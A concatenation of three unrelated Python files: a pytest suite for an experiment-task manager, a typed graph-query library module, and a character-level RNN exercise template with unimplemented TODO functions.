def test_output_path(self):
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_simple.yaml'),
platform='local')
task = tasks[0]
assert 'output_root' in task.config
assert Path(task.output_root).exists()
output_path = task.output_path
assert Path(output_path).exists()
def test_other_cwd(self):
"""Test that experiment_manager works independently from working dir"""
old_cwd = os.getcwd()
try:
os.mkdir('/tmp/hypertrainer') # TODO windows friendly?
except FileExistsError:
pass
os.chdir('/tmp/hypertrainer')
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_simple.yaml'),
platform='local')
task = tasks[0]
assert Path(task.project_path).exists()
assert Path(task.script_file).exists()
assert Path(task.output_root).exists()
assert Path(task.output_path).exists()
os.chdir(old_cwd)
def test_submit(self):
# 1. Launch task
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
task_ids = [t.id for t in tasks]
# 2. Check that the hp search configs were generated
assert len(tasks) == 3
# Wait task finished
def check_finished():
experiment_manager.update_tasks([ComputePlatformType.LOCAL])
status = Task.get(Task.id == tasks[2].id).status
return status == TaskStatus.Finished
wait_true(check_finished, interval_secs=0.5)
# 3. Check stuff on each task
p_exp10_values, p_exp2_values, p_lin_values = set(), set(), set()
orig_yaml = yaml.load(scripts_path / 'test_hp.yaml')
for t in Task.select().where(Task.id.in_(task_ids)): # type: Task
# Check that yaml has been written correctly
# NOTE: THIS FAILS IN DEBUG MODE
deep_assert_equal(t.config, orig_yaml, exclude_keys=['output_path', 'is_child', 'dummy_param_exp10',
'dummy_param_exp2', 'dummy_param_lin'])
# Check output
experiment_manager.monitor(t)
assert t.logs['err'].strip() == 'printing to stderr'
assert t.logs['out'].strip() == 'printing to stdout'
# Check status
assert t.status == TaskStatus.Finished
# Check hyperparam search
p_exp10 = t.config['training']['dummy_param_exp10']
p_exp2 = t.config['training']['dummy_param_exp2']
p_lin = t.config['training']['dummy_param_lin']
# Hyperparam value must be unique
assert p_exp10 not in p_exp10_values
assert p_exp2 not in p_exp2_values
assert p_lin not in p_lin_values
p_exp10_values.add(p_exp10)
p_exp2_values.add(p_exp2)
p_lin_values.add(p_lin)
# Hyperparameter values must be in range
assert 10 ** -2 <= p_exp10 <= 10 ** 2
assert 2 ** -2 <= p_exp2 <= 2 ** 2
assert -2 <= p_lin <= 2
def test_archive(self):
# 1. Submit local task
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
task_id = tasks[0].id
# 2. Archive task
experiment_manager.archive_tasks_by_id([task_id])
# 3. Check that it still exists
assert Task.select().where(Task.id == task_id).count() == 1
# 4. Check that is_archived == True
assert Task.get(Task.id == task_id).is_archived
# 5. Check that it is absent from the non-archived list
non_archived_tasks = experiment_manager.get_tasks(platform=ComputePlatformType.LOCAL)
assert task_id not in [t.id for t in non_archived_tasks]
# 6. Check that it is present in the archived list
archived_tasks = experiment_manager.get_tasks(archived=True, platform=ComputePlatformType.LOCAL)
assert task_id in [t.id for t in archived_tasks]
def test_unarchive(self):
# Submit local task
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
task_id = tasks[0].id
# Archive task
experiment_manager.archive_tasks_by_id([task_id])
# Unarchive task
experiment_manager.unarchive_tasks_by_id([task_id])
# Check that is_archived == False
assert not Task.get(Task.id == task_id).is_archived
# Check that it is present in the non-archived list
non_archived_tasks = experiment_manager.get_tasks(platform=ComputePlatformType.LOCAL)
assert task_id in [t.id for t in non_archived_tasks]
# Check that it is absent from the archived list
archived_tasks = experiment_manager.get_tasks(archived=True, platform=ComputePlatformType.LOCAL)
assert task_id not in [t.id for t in archived_tasks]
def test_delete(self):
def get_task_folder(task_id):
return Path(Task.get(Task.id == task_id).output_path)
# 1. Submit task
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
task_id = tasks[0].id
# 1.1 Wait that the folder exist on disk
wait_true(lambda: get_task_folder(task_id).exists())
task_folder = get_task_folder(task_id)
# 2. Try deleting task (fails since not archived yet)
with pytest.raises(RuntimeError):
experiment_manager.delete_tasks_by_id([task_id])
# 3. Archive task
experiment_manager.archive_tasks_by_id([task_id])
assert Task.get(Task.id == task_id).is_archived
# 4. Delete task
experiment_manager.delete_tasks_by_id([task_id])
# 5. Check that task does not exist in DB
assert Task.select().where(Task.id == task_id).count() == 0
# 6. Check that files on disk have been deleted
wait_true(lambda: not task_folder.exists())
def test_cancel(self):
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_long.yaml'),
platform='local')
task_id = tasks[0].id
experiment_manager.cancel_tasks_by_id([task_id])
def check_cancelled():
experiment_manager.update_tasks([ComputePlatformType.LOCAL])
t = experiment_manager.get_tasks_by_id([task_id])[0]
return t.status == TaskStatus.Cancelled
wait_true(check_cancelled)
@pytest.fixture
def ht_platform():
_ht_platform = HtPlatform()
experiment_manager.platform_instances[ComputePlatformType.HT] = _ht_platform
try:
answers = _ht_platform.ping_workers()
except (ConnectionError, ConnectionRefusedError):
raise Exception('Could not connect to Redis. Make sure redis-server is running.')
except TimeoutError:
        raise Exception('The ping timed out. A worker must be listening on the \'localhost\' queue.')
assert answers == ['localhost']
return _ht_platform
@pytest.fixture
def ht_platform_same_thread():
_ht_platform = HtPlatform(same_thread=True)
experiment_manager.platform_instances[ComputePlatformType.HT] = _ht_platform
return _ht_platform
class TestRq:
def test_submit(self, ht_platform):
# Submit rq task
tasks = experiment_manager.create_tasks(
platform='ht',
config_file=str(scripts_path / 'test_simple.yaml'))
# Check that the task has status Waiting
assert tasks[0].status == TaskStatus.Waiting
sleep(0.2) # FIXME this is too flaky
task_id = tasks[0].id
experiment_manager.update_tasks([ComputePlatformType.HT])
assert experiment_manager.get_tasks_by_id([task_id])[0].status == TaskStatus.Running
# Check that the task finishes successfully
wait_task_finished(task_id, interval_secs=2, tries=6)
def test_submit_multiple(self, ht_platform):
# Submit rq task
tasks = experiment_manager.create_tasks(
platform='ht',
config_file=str(scripts_path / 'test_hp.yaml'))
# Check that the task finishes successfully
wait_task_finished(tasks[0].id, interval_secs=1, tries=8)
def test_delete(self, ht_platform):
# Submit task
tasks = experiment_manager.create_tasks(
platform='ht',
config_file=str(scripts_path / 'test_simple.yaml'))
task_id = tasks[0].id
# Wait task finish
wait_task_finished(task_id, interval_secs=2, tries=3)
# Try deleting task (fails since not archived yet)
with pytest.raises(RuntimeError):
experiment_manager.delete_tasks_by_id([task_id])
# Archive task
experiment_manager.archive_tasks_by_id([task_id])
task = Task.get(Task.id == task_id)
assert task.is_archived
# Check that the output path exists
assert Path(task.output_path).exists()
# Delete task
experiment_manager.delete_tasks_by_id([task_id])
# Check that task does not exist in DB
assert Task.select().where(Task.id == task_id).count() == 0
# Check that files on disk have been deleted
wait_true(lambda: not Path(task.output_path).exists())
# Check that the job does not exist in the worker's db
info_dicts = ht_platform._get_info_dict_for_each_worker()
assert len(info_dicts) == 1
worker_db = info_dicts[0]
assert task.job_id not in worker_db
def test_cancel(self, ht_platform):
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_long.yaml'),
platform='ht')
task_id = tasks[0].id
# Check that the task is running
def check_running():
experiment_manager.update_tasks([ComputePlatformType.HT])
t = experiment_manager.get_tasks_by_id([task_id])[0]
return t.status == TaskStatus.Running
wait_true(check_running)
experiment_manager.cancel_tasks_by_id([task_id])
# Check that the task is cancelled
def check_cancelled():
experiment_manager.update_tasks([ComputePlatformType.HT])
t = experiment_manager.get_tasks_by_id([task_id])[0]
return t.status == TaskStatus.Cancelled
wait_true(check_cancelled)
def test_acquire_one_gpu(self, monkeypatch, ht_platform_same_thread):
monkeypatch.setenv('CUDA_VISIBLE_DEVICES', '0,1')
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_gpu_1.yaml'),
platform='ht')
t1_id = tasks[0].id
wait_task_finished(t1_id, interval_secs=1, tries=3)
t1 = experiment_manager.get_tasks_by_id([t1_id])[0]
experiment_manager.monitor(t1)
assert t1.logs['out'].strip() == 'gpu_id=0'
def wait_true(fn, interval_secs=0.4, tries=6):
for i in range(tries):
if fn():
return
else:
sleep(interval_secs)
raise TimeoutError
def wait_task_finished(task_id, interval_secs=0.4, tries=6):
def get_status():
experiment_manager.update_tasks()
return Task.get(Task.id == task_id).status
for i in range(tries):
status = get_status()
if status == TaskStatus.Finished:
return
elif status in (TaskStatus.Running, TaskStatus.Waiting):
sleep(interval_secs)
else:
experiment_manager.print_output(task_id)
raise ChildProcessError(str(status))
raise TimeoutError
|
from functools import reduce
from . import GraphError, iterables
from .memo import lambdaize, memoize
from .representations import Object
_undefined = object()
class ScalarType(object):
def __init__(self, name, coerce):
self.name = name
self._coerce = coerce
def __call__(self):
return ScalarQuery(self)
def __str__(self):
return self.name
def child_types(self):
return ()
def coerce(self, value):
return self._coerce(value)
def _coerce_boolean(value):
if isinstance(value, bool):
return value
else:
raise _coercion_error(value, Boolean)
Boolean = ScalarType("Boolean", coerce=_coerce_boolean)
def _coerce_float(value):
if isinstance(value, float):
return value
elif isinstance(value, int):
coerced = float(value)
if coerced == value:
return coerced
raise _coercion_error(value, Float)
Float = ScalarType("Float", coerce=_coerce_float)
def _coerce_int(value):
if isinstance(value, int):
return value
else:
raise _coercion_error(value, Int)
Int = ScalarType("Int", coerce=_coerce_int)
def _coerce_string(value):
if isinstance(value, str):
return value
else:
raise _coercion_error(value, String)
String = ScalarType("String", coerce=_coerce_string)
class ScalarQuery(object):
def __init__(self, type):
self.type = type
def for_type(self, target_type):
if self.type == target_type:
return self
else:
raise _query_coercion_error(self.type, target_type)
def __add__(self, other):
if not isinstance(other, ScalarQuery):
return NotImplemented
elif self.type != other.type:
raise TypeError("cannot add queries for different scalar types: {} and {}".format(
self.type,
other.type,
))
else:
return self
def __str__(self):
return "ScalarQuery(type={})".format(self.type)
class EnumType(object):
def __init__(self, enum):
self.enum = enum
@property
def name(self):
return self.enum.__name__
def __call__(self):
return EnumQuery(self)
def __str__(self):
return self.name
def child_types(self):
return ()
def coerce(self, value):
if isinstance(value, self.enum):
return value
else:
raise _coercion_error(value, self)
class EnumQuery(object):
def __init__(self, type):
self.type = type
def for_type(self, target_type):
if self.type == target_type:
return self
else:
raise _query_coercion_error(self.type, target_type)
def __add__(self, other):
if not isinstance(other, EnumQuery):
return NotImplemented
elif self.type != other.type:
raise TypeError("cannot add queries for different enum types: {} and {}".format(
self.type,
other.type,
))
else:
return self
def __str__(self):
return "EnumQuery(type={})".format(self.type)
class InputObjectType(object):
def __init__(self, name, fields):
self.name = name
self.fields = Fields(name, fields)
self.instance_type = memoize(self._create_instance_type)
def _create_instance_type(self):
name = self.name
def __init__(self, values):
self._values = values
for key in values:
setattr(self, key, values[key])
def __eq__(self, other):
if isinstance(other, instance_type):
return self._values == other._values
else:
return NotImplemented
def __ne__(self, other):
return not (self == other)
def __repr__(self):
return "{}({})".format(name, ", ".join(
"{}={!r}".format(key, value)
for key, value in self._values.items()
))
instance_type = type(
self.name,
(object, ),
dict(
__init__=__init__,
__repr__=__repr__,
__eq__=__eq__,
__ne__=__ne__,
),
)
return instance_type
def __call__(self, **explicit_field_values):
def get_field_value(field):
value = explicit_field_values.pop(field.name, field.default)
if value is _undefined:
raise GraphError("{} is missing required field {}".format(self.name, field.name))
else:
return value
field_values = iterables.to_dict(
(field.name, get_field_value(field))
for field in self.fields
)
if explicit_field_values:
key = next(iter(explicit_field_values))
raise GraphError("{} has no field {}".format(self.name, key))
return self.instance_type()(field_values)
def __repr__(self):
return "InputObjectType(name={!r})".format(self.name)
def child_types(self):
return tuple(
field.type
for field in self.fields
)
def coerce(self, value):
if isinstance(value, self.instance_type()):
return value
else:
raise _coercion_error(value, self.name)
def input_field(name, type, default=_undefined):
return InputField(name, type, default)
class InputField(object):
def __init__(self, name, type, default):
self.name = name
self.type = type
self.default = default
@property
def has_default(self):
return self.default is not _undefined
def __repr__(self):
return "InputField(name={!r}, type={!r})".format(self.name, self.type)
class InterfaceType(object):
def __init__(self, name, fields):
self.name = name
self.fields = Fields(name, fields)
def __call__(self, *field_queries):
return ObjectQuery.create(self, field_queries=field_queries)
def query(self, *, field_queries, create_object):
return ObjectQuery.create(self, field_queries=field_queries, create_object=create_object)
def __repr__(self):
return "InterfaceType(name={!r})".format(self.name)
def __str__(self):
return self.name
def child_types(self):
return _fields_child_types(self.fields)
class ListType(object):
def __init__(self, element_type):
self.element_type = element_type
def __call__(self, *args, **kwargs):
return ListQuery(self, self.element_type(*args, **kwargs))
def query(self, *args, **kwargs):
return ListQuery(self, self.element_type.query(*args, **kwargs))
def __eq__(self, other):
if isinstance(other, ListType):
return self.element_type == other.element_type
else:
return NotImplemented
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.element_type)
def __repr__(self):
return "ListType(element_type={!r})".format(self.element_type)
def __str__(self):
return "List({})".format(self.element_type)
def child_types(self):
return (self.element_type, )
def coerce(self, value):
return [
self.element_type.coerce(element)
for element in value
]
class ListQuery(object):
def __init__(self, type, element_query):
self.type = type
self.element_query = element_query
def for_type(self, target_type):
if isinstance(target_type, ListType):
element_query = self.element_query.for_type(target_type.element_type)
return ListQuery(type=target_type, element_query=element_query)
else:
raise _query_coercion_error(self.type, target_type)
def __add__(self, other):
if not isinstance(other, ListQuery):
return NotImplemented
elif self.type.element_type != other.type.element_type:
raise TypeError("cannot add queries for lists with different element types: {} and {}".format(
self.type.element_type,
other.type.element_type,
))
else:
return ListQuery(type=self.type, element_query=self.element_query + other.element_query)
def __str__(self):
return _format_call_tree("ListQuery", (
("type", self.type),
("element_query", self.element_query),
))
class NullableType(object):
def __init__(self, element_type):
self.element_type = element_type
def __call__(self, *args, **kwargs):
return NullableQuery(self, self.element_type(*args, **kwargs))
def query(self, *args, **kwargs):
return NullableQuery(self, self.element_type.query(*args, **kwargs))
def __eq__(self, other):
if isinstance(other, NullableType):
return self.element_type == other.element_type
else:
return NotImplemented
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.element_type)
def __str__(self):
return "Nullable({})".format(self.element_type)
def __repr__(self):
return "NullableType(element_type={!r})".format(self.element_type)
def child_types(self):
return (self.element_type, )
def coerce(self, value):
if value is None:
return None
else:
return self.element_type.coerce(value)
class NullableQuery(object):
def __init__(self, type, element_query):
self.type = type
self.element_query = element_query
def for_type(self, target_type):
if isinstance(target_type, NullableType):
element_query = self.element_query.for_type(target_type.element_type)
return NullableQuery(type=target_type, element_query=element_query)
else:
raise _query_coercion_error(self.type, target_type)
def __add__(self, other):
if not isinstance(other, NullableQuery):
return NotImplemented
elif self.type.element_type != other.type.element_type:
raise TypeError("cannot add queries for nullables with different element types: {} and {}".format(
self.type.element_type,
other.type.element_type,
))
else:
return NullableQuery(type=self.type, element_query=self.element_query + other.element_query)
def __str__(self):
return _format_call_tree("NullableQuery", (
("type", self.type),
("element_query", self.element_query),
))
class ObjectType(object):
def __init__(self, name, fields, interfaces=None):
if interfaces is None:
interfaces = ()
self.name = name
if not callable(fields):
fields = lambdaize(fields)
def owned_fields():
return tuple(
field.with_owner_type(self)
for field in fields()
)
self.fields = Fields(name, owned_fields)
# TODO: validation of interfaces, especially default values of arguments
self._interfaces = memoize(interfaces)
@property
def interfaces(self):
return self._interfaces()
def __call__(self, *field_queries):
return ObjectQuery.create(self, field_queries=field_queries)
def query(self, *, field_queries, create_object):
return ObjectQuery.create(self, field_queries=field_queries, create_object=create_object)
def __repr__(self):
return "ObjectType(name={!r})".format(self.name)
def __str__(self):
return self.name
def child_types(self):
return _fields_child_types(self.fields) + tuple(self.interfaces)
def _fields_child_types(fields):
return tuple(
child_type
for field in fields
for child_type in field.child_types()
)
class Fields(object):
def __init__(self, type_name, fields):
self._type_name = type_name
self._fields = memoize(fields)
def __iter__(self):
return iter(self._fields())
def __getattr__(self, field_name):
field = self._find_field(field_name)
if field is None and field_name.endswith("_"):
field = self._find_field(field_name[:-1])
if field is None:
raise GraphError("{} has no field {}".format(self._type_name, field_name))
else:
return field
def _find_field(self, field_name):
return iterables.find(lambda field: field.name == field_name, self._fields(), default=None)
class ObjectQuery(object):
@staticmethod
def create(type, *, field_queries, create_object=None):
if create_object is None:
create_object = Object
return ObjectQuery(type, field_queries=field_queries, create_object=create_object)
def __init__(self, type, field_queries, *, create_object):
self.type = type
# TODO: check field queries are valid
self.field_queries = tuple(field_queries)
self.create_object = create_object
# TODO: handling merging of other query types
def __add__(self, other):
if isinstance(other, ObjectQuery):
assert self.type == other.type
field_queries = list(map(
_merge_field_queries,
iterables.to_multidict(
((field.field, field.key), field)
for field in (self.field_queries + other.field_queries)
).values(),
))
return ObjectQuery(
type=self.type,
field_queries=field_queries,
create_object=self.create_object,
)
else:
return NotImplemented
def for_type(self, target_type):
if self.type == target_type:
return self
elif self._is_in_type_hierarchy(target_type):
field_queries = _field_queries_for_type(self.field_queries, target_type)
return ObjectQuery(
type=target_type,
field_queries=field_queries,
create_object=self.create_object,
)
else:
raise _query_coercion_error(self.type, target_type)
def _is_in_type_hierarchy(self, target_type):
return (
(
isinstance(self.type, InterfaceType) and
isinstance(target_type, ObjectType) and
self.type in target_type.interfaces
) or
(
isinstance(self.type, ObjectType) and
isinstance(target_type, InterfaceType) and
target_type in self.type.interfaces
)
)
def __str__(self):
field_queries = _format_tuple(
str(field_query)
for field_query in self.field_queries
)
return _format_call_tree("ObjectQuery", (
("type", self.type.name),
("field_queries", field_queries),
))
def _field_queries_for_type(field_queries, target_type):
if isinstance(target_type, InterfaceType):
return field_queries
else:
supertype_fields = frozenset(
field
for possible_type in target_type.interfaces
for field in possible_type.fields
)
def field_query_for_type(field_query):
# TODO: test typename_field outside of GraphQL
if field_query.field in target_type.fields or field_query.field == typename_field:
return field_query
elif field_query.field in supertype_fields:
field = iterables.find(
lambda field: field.name == field_query.field.name,
target_type.fields,
)
return field_query.for_field(field)
else:
# TODO: include subtype fields
return None
return tuple(filter(None, map(field_query_for_type, field_queries)))
def _merge_field_queries(fields):
return reduce(
lambda left, right: left + right,
fields,
)
class Args(object):
pass
def field(name, type, params=None):
if params is None:
params = ()
return Field(owner_type=None, name=name, type=type, params=params)
class Field(object):
def __init__(self, owner_type, name, type, params):
self.owner_type = owner_type
self.name = name
self.type = type
self.params = Params(name, params)
def with_owner_type(self, owner_type):
return Field(owner_type=owner_type, name=self.name, type=self.type, params=self.params)
def __call__(self, *args):
field_queries, field_args = _partition_by_type(args, (FieldQuery, Argument))
type_query = self.type(*field_queries)
# TODO: handle extra args
return self.query(key=self.name, type_query=type_query, args=field_args)
def query(self, args, key, type_query):
explicit_args = iterables.to_dict(
(arg.parameter.name, arg.value)
for arg in args
)
def get_arg(param):
value = explicit_args.get(param.name, param.default)
if value is _undefined:
raise GraphError("field {} is missing required argument {}".format(self.name, param.name))
else:
return value
field_args = Object(iterables.to_dict(
(param.name, get_arg(param))
for param in self.params
))
return FieldQuery(key=key, field=self, type_query=type_query.for_type(self.type), args=field_args)
def __repr__(self):
return "Field(name={!r}, type={!r})".format(self.name, self.type)
def child_types(self):
return (self.type, ) + tuple(
param.type
for param in self.params
)
def _partition_by_type(values, types):
results = tuple([] for type in types)
for value in values:
potential_results = [
result
for type, result in zip(types, results)
if isinstance(value, type)
]
if potential_results:
potential_results[0].append(value)
else:
raise GraphError("unexpected argument: {!r}\nExpected arguments of type {} but had type {}".format(
value,
" or ".join(sorted([type.__name__ for type in types])),
type(value).__name__,
))
return results
class Params(object):
def __init__(self, field_name, params):
self._field_name = field_name
self._params = params
def __iter__(self):
return iter(self._params)
def __getattr__(self, param_name):
param = self._find_param(param_name)
if param is None and param_name.endswith("_"):
param = self._find_param(param_name[:-1])
if param is None:
raise GraphError("{} has no param {}".format(self._field_name, param_name))
else:
return param
def _find_param(self, param_name):
return iterables.find(lambda param: param.name == param_name, self._params, default=None)
class FieldQuery(object):
def __init__(self, key, field, type_query, args):
self.key = key
self.field = field
self.type_query = type_query
self.args = args
def __add__(self, other):
if isinstance(other, FieldQuery):
assert self.key == other.key
assert self.field == other.field
assert self.args == other.args
return FieldQuery(
key=self.key,
field=self.field,
type_query=self.type_query + other.type_query,
args=self.args,
)
else:
return NotImplemented
def for_field(self, field):
# TODO: deal with nullability changes?
return FieldQuery(
key=self.key,
field=field,
type_query=self.type_query,
args=self.args,
)
def __str__(self):
field = "{}.fields.{}".format(self.field.owner_type.name, self.field.name)
args = _format_tuple(
"{}.params.{}({})".format(field, param.name, getattr(self.args, param.name))
for param in self.field.params
)
return _format_call_tree("FieldQuery", (
("key", '"{}"'.format(self.key)),
("field", field),
("type_query", self.type_query),
("args", args),
))
def key(key, field_query):
return FieldQuery(
key=key,
field=field_query.field,
type_query=field_query.type_query,
args=field_query.args,
)
def param(name, type, default=_undefined):
return Parameter(name=name, type=type, default=default)
class Parameter(object):
def __init__(self, name, type, default):
self.name = name
self.type = type
self.default = default
@property
def has_default(self):
return self.default is not _undefined
def __call__(self, value):
return Argument(parameter=self, value=self.type.coerce(value))
class Argument(object):
def __init__(self, parameter, value):
self.parameter = parameter
self.value = value
def collect_types(types):
all_types = set()
def collect(graph_type):
if graph_type is not None and graph_type not in all_types:
all_types.add(graph_type)
for child in graph_type.child_types():
collect(child)
for graph_type in types:
collect(graph_type)
return all_types
def _format_call_tree(receiver, args):
return "{}({}\n)".format(receiver, "".join(
_indent("\n{}={},".format(key, value))
for key, value in args
))
def _format_tuple(elements):
elements = tuple(elements)
if elements:
return "(" + _indent("".join(
"\n" + element + ","
for element in elements
)) + "\n)"
else:
return "()"
def _indent(value):
return value.replace("\n", "\n ")
def _coercion_error(value, target_type):
return GraphError("cannot coerce {!r} to {}".format(value, target_type))
def _query_coercion_error(source_type, target_type):
return TypeError("cannot coerce query for {} to query for {}".format(
source_type,
target_type,
))
typename_field = field("type_name", type=String)
def to_element_type(graph_type):
if isinstance(graph_type, (ListType, NullableType)):
return to_element_type(graph_type.element_type)
else:
return graph_type
def replace_element_type(graph_type, element_type):
if isinstance(graph_type, ListType):
return ListType(replace_element_type(graph_type.element_type, element_type))
elif isinstance(graph_type, NullableType):
return NullableType(replace_element_type(graph_type.element_type, element_type))
else:
return element_type
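# Illustrative sketch (not part of the original module): the classes above
# form a small query algebra.  Assuming the module is imported as part of its
# package, an ObjectType with scalar fields can be declared and queried as
# below; `Book`, `title` and `page_count` are made-up names for this example
# only.
if __name__ == "__main__":
    Book = ObjectType("Book", fields=lambda: (
        field("title", type=String),
        field("page_count", type=Int),
    ))
    book_query = Book(
        Book.fields.title(),
        Book.fields.page_count(),
    )
    # ObjectQuery.__str__ renders the query tree built above
    print(book_query)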
|
import torch
import numpy as np
from torch import nn
import torch.nn.functional as F
from IPython.display import clear_output
import matplotlib.pyplot as plt
def make_tokens(input_text):
r"""Makes a list of all unique characters in the `input_text`.
Parameters
----------
input_text : str
Input text for RNN training. Should be a simple plain text file.
Returns
-------
tokens : list of str
List with all unique tokens.
"""
# Your final implementation shouldn't have any loops
# TODO: implement make_tokens
raise NotImplementedError('Not implemented!')


def make_token_to_id(tokens):
    r"""Creates a mapping between tokens and their int identifiers.

    Parameters
    ----------
    tokens : list of str
        List with all unique tokens.

    Returns
    -------
    token_to_id : dict of str
        Mapping from each token to its identifier (index in the tokens list).
    """
    # TODO: implement make_token_to_id
    raise NotImplementedError('Not implemented!')
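

# A minimal reference sketch for the exercise above, kept under a separate name:
# each token maps to its index in the (already unique) token list.
def _reference_make_token_to_id(tokens):
    return {token: index for index, token in enumerate(tokens)}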


class CharRNNCell(nn.Module):
    r"""Vanilla RNN cell with tanh non-linearity.

    Parameters
    ----------
    num_tokens : int
        Size of the token dictionary.
    embedding_size : int
        Size of the token embedding vector.
    rnn_num_units : int
        Number of features in the hidden state vector.

    Attributes
    ----------
    num_units : int
        Number of features in the hidden state vector.
    embedding : nn.Embedding
        An embedding layer that converts character ids to vectors.
    rnn_update : nn.Linear
        A linear layer that creates a new hidden state vector.
    rnn_to_logits : nn.Linear
        An output layer that predicts logits for the next character.
    """

    def __init__(self, num_tokens, embedding_size=16, rnn_num_units=64):
        super(CharRNNCell, self).__init__()
        self.num_units = rnn_num_units
        self.embedding = nn.Embedding(num_tokens, embedding_size)
        self.rnn_update = nn.Linear(
            embedding_size + rnn_num_units,
            rnn_num_units,
        )
        self.rnn_to_logits = nn.Linear(rnn_num_units, num_tokens)

    def forward(self, x, h_prev):
        r"""Compute h_next(x, h_prev) and log(P(x_next | h_next)).

        We'll call it repeatedly to produce the whole sequence.

        Parameters
        ----------
        x : torch.LongTensor, shape(batch_size)
            Batch of character ids.
        h_prev : torch.FloatTensor, shape(batch_size, num_units)
            Previous rnn hidden states.

        Returns
        -------
        h_next : torch.FloatTensor, shape(batch_size, num_units)
            Next rnn hidden states.
        x_next_proba : torch.FloatTensor, shape(batch_size, num_tokens)
            Predicted log-probabilities for the next token.
        """
        # get vector embedding of x
        x_emb = self.embedding(x)

        # TODO: compute next hidden state using self.rnn_update
        # hint: use torch.cat(..., dim=...) for concatenation
        raise NotImplementedError('Not implemented!')
        h_next = ...
        h_next = torch.tanh(h_next)

        # TODO: compute logits for next character probs
        raise NotImplementedError('Not implemented!')
        logits = ...

        return h_next, F.log_softmax(logits, -1)

    def initial_state(self, batch_size):
        r"""Returns rnn state before it processes first input (aka h_0)."""
        return torch.zeros(batch_size, self.num_units)
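

# A possible completion of the forward pass above, shown as a small subclass so
# the exercise template stays untouched (a sketch of one standard solution, not
# necessarily the graded one).
class _ReferenceCharRNNCell(CharRNNCell):
    def forward(self, x, h_prev):
        # embed the current characters
        x_emb = self.embedding(x)
        # concatenate the embedding with the previous hidden state
        x_and_h = torch.cat([x_emb, h_prev], dim=-1)
        # linear update followed by tanh non-linearity gives the next hidden state
        h_next = torch.tanh(self.rnn_update(x_and_h))
        # project the hidden state to per-token logits
        logits = self.rnn_to_logits(h_next)
        return h_next, F.log_softmax(logits, -1)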


def rnn_loop(char_rnn, batch_ix):
    r"""Computes log P(next_character) for all time-steps in batch_ix."""
    batch_size, max_length = batch_ix.size()
    hid_state = char_rnn.initial_state(batch_size)
    log_probs = []
    for x_t in batch_ix.transpose(0, 1):
        hid_state, log_p_next = char_rnn(x_t, hid_state)
        log_probs.append(log_p_next)
    return torch.stack(log_probs, dim=1)
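

# Quick shape check for rnn_loop (illustrative; uses the reference cell above so
# it does not hit the unimplemented template forward()):
#
#     cell = _ReferenceCharRNNCell(num_tokens=30)
#     dummy_batch = torch.randint(0, 30, (4, 10))
#     assert rnn_loop(cell, dummy_batch).shape == (4, 10, 30)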


def train_rnn(encoded_lines, model, optimizer, iterations=1000):
    r"""Trains RNN on a given text.

    Parameters
    ----------
    encoded_lines : np.ndarray, shape(n_samples, MAX_LENGTH)
        Lines of input text converted to a matrix.
    model : torch.nn.Module
        A model to train.
    optimizer : torch.optim.Optimizer
        Optimizer that will be used to train the model.
    iterations : int, optional
        Number of optimization steps that the model will make.

    Returns
    -------
    training_history : list of float
        Training history consisting of mean-loss-per-iteration records.
    """
    training_history = []
    for i in range(iterations):
        batch_indices = np.random.choice(len(encoded_lines), 32, replace=False)
        batch_ix = encoded_lines[batch_indices]
        batch_ix = torch.tensor(batch_ix, dtype=torch.int64)

        # TODO: implement train loop
        raise NotImplementedError('Not implemented!')
        log_p_seq = rnn_loop(model, batch_ix)

        # TODO: compute loss
        loss = ...

        # TODO: train with backprop

        training_history.append(loss.item())
        if (i + 1) % 100 == 0:
            clear_output(True)
            plt.plot(training_history, label='loss')
            plt.legend()
            plt.show()

    return training_history
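

# One way to fill in the training step above, factored out as a reference helper
# (a sketch of the standard next-character negative log-likelihood objective, not
# necessarily the graded solution).
def _reference_train_step(model, optimizer, batch_ix):
    log_p_seq = rnn_loop(model, batch_ix)
    # predictions at position t score the token observed at position t + 1
    predictions = log_p_seq[:, :-1]
    actual_next_tokens = batch_ix[:, 1:]
    logp_next = torch.gather(predictions, dim=2, index=actual_next_tokens[:, :, None])
    loss = -logp_next.mean()
    # backprop and parameter update
    loss.backward()
    optimizer.step()
    optimizer.zero_grad()
    return loss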
|